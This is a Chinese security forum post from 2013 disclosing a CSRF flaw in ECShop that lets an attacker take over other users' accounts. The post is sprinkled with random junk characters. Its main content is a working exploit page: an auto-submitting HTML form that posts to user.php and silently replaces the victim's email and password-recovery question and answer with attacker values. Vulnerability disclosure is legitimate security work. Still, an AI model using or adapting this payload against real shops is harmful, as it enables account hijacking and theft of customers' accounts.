找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1942|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
  u( l% a5 k6 }1 ^- c8 Pecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现# h5 r* O- W: i- j

, T2 _; r" a" N5 ^Demo For:http://www.wooyun.org/bug.php?action=view&id=395  z; n; o% g2 ?* J8 w
1 n# B+ |( L# A9 t7 d9 C" X
详细说明:
5 E4 Y  o/ W( J9 H" p) y2 S8 p$ m利用csrf和xss可以突破官方所说的“障碍”
5 r1 e+ D5 Y/ |; \xss版本已经有人说明
7 E/ d" J3 T2 R+ J) H这里给出csrf版本7 F: T) `  `* P
$ \5 L( d; Y$ z3 H0 I$ g' ~9 O
漏洞证明:$ y. `3 P2 `6 O1 ^5 }& D
<html>8 d3 T  e& \0 c1 Y2 P  V
<body>' f# m- `# c" p/ i
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
7 ]2 q+ b' @8 v2 V<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">3 j* Q' i  g0 A
<INPUT TYPE="text" NAME="act" value="act_edit_profile">& r$ c# I! p) [+ |
<INPUT TYPE="text" NAME="sel_question" value="ecshop">: A: h8 A3 [$ w8 K0 E
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">* o6 w8 K' w; Z' |* `
</body>
3 r6 W- s/ U. ]8 {, Z7 @8 c<script>, a6 O; M: k4 j
document.forms[0].submit();
- P; S$ D, C7 y  s; J</script>
' X1 Q9 x" f& P( K6 |, L</html>
# X' P) ?8 {0 z! A# m: t构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
* r6 s* ^* o1 [0 O$ F% F3 o9 X. a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表